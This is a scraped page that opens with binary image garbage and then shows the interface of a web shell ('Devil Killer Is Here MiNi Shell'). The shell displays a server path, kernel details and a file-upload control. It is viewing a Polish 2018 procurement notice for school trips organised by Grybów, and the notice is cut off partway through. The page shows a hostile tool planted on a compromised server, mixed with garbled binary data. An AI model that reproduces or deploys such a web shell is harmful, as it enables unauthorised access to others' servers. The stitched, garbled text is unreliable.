JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180430/553098-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 553098-N-2018 z dnia 2018-04-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Burmistrz Miasta Grybów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Organizacja zajęć wyjazdowych w ramach projektu ,,Nowoczesna szkoła" realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 2014-2020.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie realizowane w ramach projektu ,,Nowoczesna szkoła" realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 2014-2020, 10 Oś Priorytetowa Wiedza i kompetencje, Działanie 10.1 Rozwój kształcenia ogólnego, Poddziałanie 10.1.3 Edukacja w szkołach prowadzących kształcenie ogólne.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Burmistrz Miasta Grybów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">52779900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">12</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">33330 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Grybów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">184 450 140</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">umgrybow@pro.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">184 450 202</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.grybow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.grybow.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.grybow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Organizacja zajęć wyjazdowych w ramach projektu ,,Nowoczesna szkoła" realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 2014-2020.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BGiOŚ.271.18.19.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> 3.1. Przedmiotem zamówienia jest zorganizowanie zajęć wyjazdowych w ramach projektu ,,Nowoczesna szkoła" realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 2014-2020, 10 Oś Priorytetowa Wiedza i kompetencje, Działanie 10.1 Rozwój kształcenia ogólnego, Poddziałanie 10.1.3 Edukacja w szkołach prowadzących kształcenie ogólne. 3.2. Wykonawca zorganizuje zajęcia wyjazdowe wg poniższego schematu: 3.2.1. Zajęcia wyjazdowe dla I i II grupy koła przyrodniczego do Ojcowa - Ojcowski Park Narodowy. 3.2.2. Zajęcia wyjazdowe dla III i IV grupy koła przyrodniczego do Ojcowa - Ojcowski Park Narodowy. 3.2.3. Zajęcia wyjazdowe dla I i II grupy koła matematycznego do Krakowa. 3.2.4. Zajęcia wyjazdowe dla III, IV i V grupy koła matematycznego do Krakowa. 3.2.5. Zajęcia wyjazdowe dla grup I-VI zajęć dydaktyczno-wyrównawczych do Krakowa. 3.3. Zajęcia wyjazdowe dla I i II grupy koła przyrodniczego do Ojcowa - Ojcowski Park Narodowy. 3.3.1. Założenia: 3.3.1.1. Liczba uczestników: max. 31 uczniów (tj. 2 grupy) z klas I-IV SP. 3.3.1.2. Liczba opiekunów szkolnych: 1 osoba. 3.3.1.3. Termin wyjazdu: od podpisania umowy do 15 czerwca 2018 r. (dni: od poniedziałku do piątku). 3.3.1.4. Czas trwania: wyjazd jednodniowy. 3.3.1.5. Miejsce wyjazdu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1. 3.3.1.6. Miejsce powrotu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1. 3.3.2. Transport: Wykonawca zapewni dojazd i przejazd z miejsca wyjazdu na miejsce pobytu, na trasie gwarantowanej wycieczki (zgodnie z jej programem) i powrót z pobytu z wykorzystaniem środków transportu (autokaru lub busa o podwyższonym standardzie wyposażonym w klimatyzację/ogrzewanie): 3.3.2.1. dopuszczonych do ruchu i odpowiadających wymaganiom ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2007 r. Nr 125, poz. 874 z późn. zm.) - posiadających aktualny przegląd i ubezpieczenie, 3.3.2.2. spełniających wszystkie wymogi bezpieczeństwa i kodeksu drogowego, 3.3.2.3. prowadzonych przez osoby posiadające odpowiednie uprawnienia do świadczenia tychże usług. 3.3.3. Ubezpieczenie: NNW na czas przejazdu i pobytu od kosztów leczenia i następstw nieszczęśliwych wypadków na min. 10000,00 zł dla każdego uczestnika wyjazdu (tj. uczniowie i opiekunowie szkolni). 3.3.4. Wyżywienie: 3.3.4.1. Wyżywienie dla 31 uczniów i 1 opiekuna szkolnego. 3.3.4.2. Wykonawca jest zobowiązany zagwarantować drugie śniadanie i obiad, przygotowany zgodnie z zasadami racjonalnego żywienia określonymi w obowiązujących przepisach prawa i odpowiadające normom pod względem: ilości, jakości i wartości odżywczych - drugie śniadanie powinno się składać z drożdżówki (masa min. 80g różne rodzaje np. z owocami, serem) oraz soku owocowego w butelce plastikowej o poj. min. 300 ml, obiad powinien składać się z ciepłego posiłku - porcja: ziemniaki lub frytki (o wadze min. 100 g), kotlet drobiowy lub schabowy (o wadze min. 100 g), zestaw min. 3 surówek, w tym: mizeria, marchewka, buraczki, kompot oraz owoc (jabłko, gruszka lub banan). 3.3.4.3. Żywienie uczestników powinno odbywać się zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w odrębnych przepisach. 3.3.4.4. Wykonawca zapewni obiad serwowany w restauracji. Każdy z uczestników będzie mieć zapewnione miejsce do posiłku (stolik i krzesło wraz z zastawą). Nie dopuszcza się podawania obiadu w naczyniach jednorazowych. 3.3.5. Kadra: 3.3.5.1. kierownik techniczno-organizacyjny wyjazdu - osoba, która posiada uprawnienia do pełnienia funkcji kierownika wycieczek szkolnych (odpowiedzialny za harmonogram wyjazdu, kontakty z przedstawicielami odwiedzanych instytucji miejsc, miejsca spożywania posiłków, inne sprawy techniczno-organizacyjne), 3.3.5.2. przewodnicy / osoby z uprawnieniami do oprowadzania po zwiedzanych instytucjach, 3.3.5.3. trzech opiekunów grupy posiadających kalifikacje zgodne z przepisami MEN. 3.3.6. Bilety wstępu do zwiedzanych miejsc dla uczniów i opiekunów szkolnych. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu i zwiedzanie z przewodnikiem: 3.3.6.1. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu dla wszystkich uczestników zajęć wyjazdowych i zwiedzanie z przewodnikiem: a) Ojcowski Park Narodowy, w tym m.in.: Kaplica ,,Na Wodzie", Jaskinia Łokietka, Ruiny zamku w Ojcowie, Brama Krakowska, b) Pokaz filmu w technologii 3D oraz zwiedzanie ekspozycji przyrodniczej Ojcowskiego Parku Narodowego. 3.3.7. Program zajęć wyjazdowych: 3.3.7.1. Wykonawca zobowiązany jest do przedstawienia wraz z ofertą propozycji programu wyjazdu (konkretnej daty wyjazdu i szczegółowego harmonogramu zawierającego godziny poszczególnych elementów planu dnia), w tym minimum: a) wyjazd spod SP nr 1 w Grybowie, ul. Szkolna 1 b) przyjazd do Ojcowa c) zwiedzanie z przewodnikiem Ojcowskiego Parku Narodowego, w tym m.in.: Kaplica ,,Na Wodzie", Jaskinia Łokietka, Ruiny zamku w Ojcowie, Brama Krakowska d) pokaz filmu w technologii 3D oraz zwiedzanie ekspozycji przyrodniczej Ojcowskiego Parku Narodowego e) II śniadanie f) obiad g) powrót do SP nr 1 w Grybowie, ul. Szkolna 1 3.3.7.2. Wykonawca zobowiązany jest do dostosowania trasy zwiedzania do wieku uczestników zajęć wyjazdowych. 3.4. Zajęcia wyjazdowe dla III i IV grupy koła przyrodniczego do Ojcowa - Ojcowski Park Narodowy. 3.4.1. Założenia: 3.4.1.1. Liczba uczestników: max. 32 uczniów (tj. 2 grupy) z klas IV - VII SP. 3.4.1.2. Liczba opiekunów szkolnych: 1 osoba. 3.4.1.3. Termin wyjazdu: od podpisania umowy do 15 czerwca 2018 r. (dni: od poniedziałku do piątku). 3.4.1.4. Czas trwania: wyjazd jednodniowy. 3.4.1.5. Miejsce wyjazdu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1. 3.4.1.6. Miejsce powrotu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1. 3.4.2. Transport: Wykonawca zapewni dojazd i przejazd z miejsca wyjazdu na miejsce pobytu, na trasie gwarantowanej wycieczki (zgodnie z jej programem) i powrót z pobytu z wykorzystaniem środków transportu (autokaru lub busa o podwyższonym standardzie wyposażonym w klimatyzację/ogrzewanie): 3.4.2.1. dopuszczonych do ruchu i odpowiadających wymaganiom ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2007 r. Nr 125, poz. 874 z późn. zm.) - posiadających aktualny przegląd i ubezpieczenie, 3.4.2.2. spełniających wszystkie wymogi bezpieczeństwa i kodeksu drogowego, 3.4.2.3. prowadzonych przez osoby posiadające odpowiednie uprawnienia do świadczenia tychże usług. 3.4.3. Ubezpieczenie: NNW na czas przejazdu i pobytu od kosztów leczenia i następstw nieszczęśliwych wypadków na min. 10000,00 zł dla każdego uczestnika wyjazdu (tj. uczniowie i opiekunowie szkolni). 3.4.4. Wyżywienie 3.4.4.1. Wyżywienie dla 32 uczniów i 1 opiekuna szkolnego. 3.4.4.2. Wykonawca jest zobowiązany zagwarantować drugie śniadanie i obiad, przygotowany zgodnie z zasadami racjonalnego żywienia określonymi w obowiązujących przepisach prawa i odpowiadające normom pod względem: ilości, jakości i wartości odżywczych - drugie śniadanie powinno się składać z drożdżówki (masa min. 80g różne rodzaje np. z owocami, serem) oraz soku owocowego w butelce plastikowej o poj. min. 300 ml, obiad powinien składać się z ciepłego posiłku - porcja: ziemniaki lub frytki (o wadze min. 100 g), kotlet drobiowy lub schabowy (o wadze min. 100 g), zestaw min. 3 surówek, w tym: mizeria, marchewka, buraczki, kompot oraz owoc (jabłko, gruszka lub banan). 3.4.4.3. Żywienie uczestników powinno odbywać się zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w odrębnych przepisach. 3.4.4.4. Wykonawca zapewni obiad serwowany w restauracji. Każdy z uczestników będzie mieć zapewnione miejsce do posiłku (stolik i krzesło wraz z zastawą). Nie dopuszcza się podawania obiadu w naczyniach jednorazowych. 3.4.5. Kadra: 3.4.5.1. kierownik techniczno-organizacyjny wyjazdu - osoba, która posiada uprawnienia do pełnienia funkcji kierownika wycieczek szkolnych (odpowiedzialny za harmonogram wyjazdu, kontakty z przedstawicielami odwiedzanych instytucji miejsc, miejsca spożywania posiłków i inne sprawy techniczno-organizacyjne). 3.4.5.2. przewodnicy / osoby z uprawnieniami do oprowadzania po zwiedzanych instytucjach. 3.4.5.3. Trzech opiekunów grupy, posiadających kwalifikacje zgodnie z przepisami MEN. 3.4.6. Bilety wstępu do zwiedzanych miejsc dla uczniów i opiekunów szkolnych. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu i zwiedzanie z przewodnikiem: 3.4.6.1. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu dla wszystkich uczestników zajęć wyjazdowych i zwiedzanie z przewodnikiem: a) Ojcowski Park Narodowy, w tym m.in.: Kaplica ,,Na Wodzie", Jaskinia Łokietka, Ruiny zamku w Ojcowie, Brama Krakowska, b) Pokaz filmu w technologii 3D oraz zwiedzanie ekspozycji przyrodniczej Ojcowskiego Parku Narodowego. 3.4.7. Program zajęć wyjazdowych: 3.4.7.1. Wykonawca zobowiązany jest do przedstawienia wraz z ofertą propozycji programu wyjazdu (konkretnej daty wyjazdu i szczegółowego harmonogramu zawierającego godziny poszczególnych elementów planu dnia), w tym minimum: a) wyjazd spod SP nr 1 w Grybowie, ul. Szkolna 1 b) przyjazd do Ojcowa c) zwiedzanie z przewodnikiem Ojcowskiego Parku Narodowego, w tym m.in.: Kaplica ,,Na Wodzie", Jaskinia Łokietka, Ruiny zamku w Ojcowie, Brama Krakowska d) pokaz filmu w technologii 3D oraz zwiedzanie ekspozycji przyrodniczej Ojcowskiego Parku Narodowego e) II śniadanie f) obiad g) powrót do SP nr 1 w Grybowie, ul. Szkolna 1 3.4.7.2. Wykonawca zobowiązany jest do dostosowania trasy zwiedzania do wieku uczestników zajęć wyjazdowych. 3.5. Zajęcia wyjazdowe dla I i II grupy koła matematycznego do Krakowa. 3.5.1. Założenia: 3.5.1.1. Liczba uczestników: max. 16 uczniów (tj. 2 grupy) z klas I-IV SP 3.5.1.2. Liczba opiekunów szkolnych: 1 osoba 3.5.1.3. Termin wyjazdu: od podpisania umowy do 15 czerwca 2018 r. (dni: od poniedziałku do piątku) 3.5.1.4. Czas trwania: wyjazd jednodniowy 3.5.1.5. Miejsce wyjazdu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1 3.5.1.6. Miejsce powrotu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1 3.5.2. Transport: Wykonawca zapewni dojazd i przejazd z miejsca wyjazdu na miejsce pobytu, na trasie gwarantowanej wycieczki (zgodnie z jej programem) i powrót z pobytu z wykorzystaniem środków transportu (autokaru lub busa o podwyższonym standardzie wyposażonym w klimatyzację/ogrzewanie): 3.5.2.1. dopuszczonych do ruchu i odpowiadających wymaganiom ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2007 r. Nr 125, poz. 874 z późn. zm.) - posiadających aktualny przegląd i ubezpieczenie, 